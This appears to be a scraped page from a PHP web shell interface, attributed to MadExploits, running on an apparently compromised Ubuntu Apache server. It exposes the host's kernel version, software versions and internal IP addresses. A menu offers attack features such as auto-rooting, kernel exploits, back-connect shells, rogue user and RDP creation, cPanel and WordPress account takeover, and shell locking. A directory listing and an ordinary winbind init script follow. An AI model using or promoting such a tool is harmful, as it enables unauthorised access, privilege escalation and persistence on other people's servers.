Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc1.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01irqbalance
2.58
KB
-rwxr-xr-x
K01iscsid
1.47
KB
-rwxr-xr-x
K01krb5-admin-server
3.33
KB
-rwxr-xr-x
K01krb5-kdc
3.02
KB
-rwxr-xr-x
K01lvm2-lvmpolld
586
B
-rwxr-xr-x
K01mariadb
6.59
KB
-rwxr-xr-x
K01multipath-tools
2.76
KB
-rwxr-xr-x
K01nginx
4.47
KB
-rwxr-xr-x
K01nmbd
1.89
KB
-rwxr-xr-x
K01open-iscsi
2.38
KB
-rwxr-xr-x
K01open-vm-tools
1.8
KB
-rwxr-xr-x
K01postgresql
1.46
KB
-rwxr-xr-x
K01samba-ad-dc
2.21
KB
-rwxr-xr-x
K01smbd
2.01
KB
-rwxr-xr-x
K01sssd
2.5
KB
-rwxr-xr-x
K01ufw
2.03
KB
-rwxr-xr-x
K01uuidd
1.28
KB
-rwxr-xr-x
K01vsftpd
2.02
KB
-rwxr-xr-x
K01winbind
1.45
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01winbind
#!/bin/sh ### BEGIN INIT INFO # Provides: winbind # Required-Start: $network $remote_fs $syslog # Required-Stop: $network $remote_fs $syslog # Should-Start: samba # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Samba Winbind daemon # Description: Name Service Switch daemon for resolving names from NT servers ### END INIT INFO PATH=/sbin:/bin:/usr/sbin:/usr/bin [ -r /etc/default/winbind ] && . /etc/default/winbind DAEMON=/usr/sbin/winbindd PIDDIR=/run/samba WINBINDPID=$PIDDIR/winbindd.pid # clear conflicting settings from the environment unset TMPDIR # See if the daemon is there test -x $DAEMON || exit 0 SERVER_ROLE=`samba-tool testparm --parameter-name="server role" 2>/dev/null | tail -1` if [ "$SERVER_ROLE" = "active directory domain controller" ]; then exit 0 fi . /lib/lsb/init-functions case "$1" in start) log_daemon_msg "Starting the Winbind daemon" "winbind" start-stop-daemon --start --quiet --oknodo --exec $DAEMON --pidfile $WINBINDPID -- $WINBINDD_OPTS log_end_msg $? ;; stop) log_daemon_msg "Stopping the Winbind daemon" "winbind" start-stop-daemon --stop --quiet --oknodo --exec $DAEMON --pidfile $WINBINDPID log_end_msg $? ;; restart|force-reload) $0 stop && sleep 2 && $0 start ;; status) status_of_proc -p $WINBINDPID $DAEMON winbind && exit 0 || exit $? ;; *) echo "Usage: /etc/init.d/winbind {start|stop|restart|force-reload|status}" exit 1 ;; esac
Close